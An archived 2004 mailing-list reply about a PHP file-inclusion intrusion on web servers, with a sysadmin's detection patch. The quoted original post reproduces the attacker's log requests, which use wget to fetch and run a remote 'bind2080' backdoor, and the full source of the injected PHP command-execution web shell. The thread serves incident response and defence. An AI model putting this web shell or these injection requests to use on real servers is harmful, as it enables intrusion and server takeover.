Re: Hack attempt

From: nathan c. dickerson (nathan_at_pro.net)
Date: 07/24/04

Next message: Spurge: "SSO on linux"

Previous message: Alex Derkach: "Re: Hack attempt"
In reply to: Norbert Crettol: "Hack attempt"
Next in thread: Jan.Albrecht_at_bertelsmann.de: "RE: Hack attempt"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: Fri, 23 Jul 2004 23:18:40 -0700
To: Norbert Crettol <norbert.crettol@idiap.ch>

Hi Norbert,

I dealt with the exact same intrusion technique on one of the webservers
here two weeks ago. They managed to get in and launch a perl based IRC
bot which was essentially a remote shell. This raised the CPU, which
shows up in our server monitering software, and I managed to detect and
stop it before they got root. I had the temp directories set to
non-executable, and had some firewall settings so they needed to use a
script interpreted callback technique to really get access. (binary
executables wouldn't work with the nonexec temp directories).

It was also a file injection. After awhile trying to figure out how they
were getting in (120+ websites on the machine), I found where they were
attacking, and patched the file with:

<?php
if(!$bodyfile){
 $bodyfile = "default"; // change to default body file.
}
else {
 $ret = strstr($bodyfile, "://");
 if($ret == true) {
 echo "Send your message telling them to go away here :)";
 $message = print_r($_SERVER, true);
 mail("your@email.com", "Exploit attempt detected",
$message);
 exit();
 }
}
?>

An attacker can inject files via php's https:// ftp:// http:// streams.
This detection stops the attack, prints them a message, and dump all the
server variables in an email.

They were more annoying then anything, so I thought it would be fun to
send them a little message upon attack.

It is quite possible to have it execute a suid program to modified your
IP tables to automatically ban further connections from their address.
Its just a neat way to express your annoyance, while gaining some
information on the attacker.

The attackers I dealt with were looking to deface the websites, and I
managed to track them down (on the web and irc) to a defacement group
out of Brazil, including some home DSL ips, which probably were their
real addresses.

Norbert Crettol wrote:

>Hi all.
>
>This is my first post here. I'm Norbert Crettol, one of the sysadmins
>of Idiap, a research center in Switzerland (www.idiap.ch).
>
>We've had a undesired visitor, last night, that I discovered in the
>reports of tripwire.
>
>Here are the logs we got (we get a remote copy of the web server logs
>in another host). As of the second line, I've stripped the head and
>the tail of the line which is allways the same.
>--- begin ---
>"GET /<some script>.php?bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=id HTTP/1.0" 200 6625 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
>bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=uname%20-a
>bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=wget
>bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=/sbin/ifconfig%20-a
>bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/;ls%20-la
>bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;ls%20-la
>bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;wget%20bosscalvin.com/bind2080
>bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;chmod%20755%20bind2080
>bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;./bind2080
>--- end ---
>I've seen no other
>
>It looks like bind8080 has created a directory /var/lock/.tmp
>and expanded an (owned by the web server owner) archive there. Here
>is the list of the files :
> 3225 jui 20 03:53 c-leet
> 15 jui 20 03:47 c-leet.dir
> 51 jui 20 03:47 cron.d
> 512 mai 12 2002 doc/
> 14 jui 21 16:27 eggdrop -> eggdrop-1.6.10*
> 2523568 mai 12 2002 eggdrop-1.6.10*
> 512 mai 12 2002 filesys/
> 343 fév 11 03:55 ****
> 512 mai 12 2002 help/
> 21149 nov 4 2003 kik*
> 1024 jui 21 11:00 language/
> 512 mai 12 2002 logs/
> 6 jui 20 03:48 pid.CaEm-
> 23065 jan 29 15:00 proc*
> 6 jui 20 03:48 psybnc.pid
> 28591 mai 12 2002 README
> 89 jui 20 03:53 run*
> 588 avr 1 10:00 run-*
> 708 avr 1 10:00 run--*
> 512 mar 31 08:12 scripts/
> 512 mai 12 2002 text/
> 2523568 mar 28 01:41 vi*
> 30293 nov 17 2002 xhide*
> 182 jui 20 03:47 y2kupdate*
>
>Here is the content of http://www.bosscalvin.com/inject.txt :
>--- begin ---
>
> <center>
>CMD - System Command </center></center> 
># CMD PHP : 
># Released by : SecurityCorp 
># Edited by CaEm
> 
> 
><hr color="red" width=751px height=115px>
> 
><pre>
><?
> // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
> if (isset($chdir)) @chdir($chdir);
> ob_start();
> system("$cmd 1> /tmp/nobody 2>&1; cat /tmp/nobody; rm -rf /tmp/nobody");
> $output = ob_get_contents();
> ob_end_clean();
> if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
>?>
></pre>
> 
><hr color="red" width=751px height=115px>
> 
>« CaEm » @ îrç.Ðå£.ñët #Renjana 
>--- end ---
>
>Has someone seen this kind of attack ? (chkrootkit doesn't detect it).
>Has someone heard of this www.bosscalvin.com (or www.calvinmumu.org) ?
>Is there a way to stop this guy ? His nickname (CaEm) appears in the
>the uploaded scripts.
>
>Norbert
>
>
>
>

Next message: Spurge: "SSO on linux"

Previous message: Alex Derkach: "Re: Hack attempt"
In reply to: Norbert Crettol: "Hack attempt"
Next in thread: Jan.Albrecht_at_bertelsmann.de: "RE: Hack attempt"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]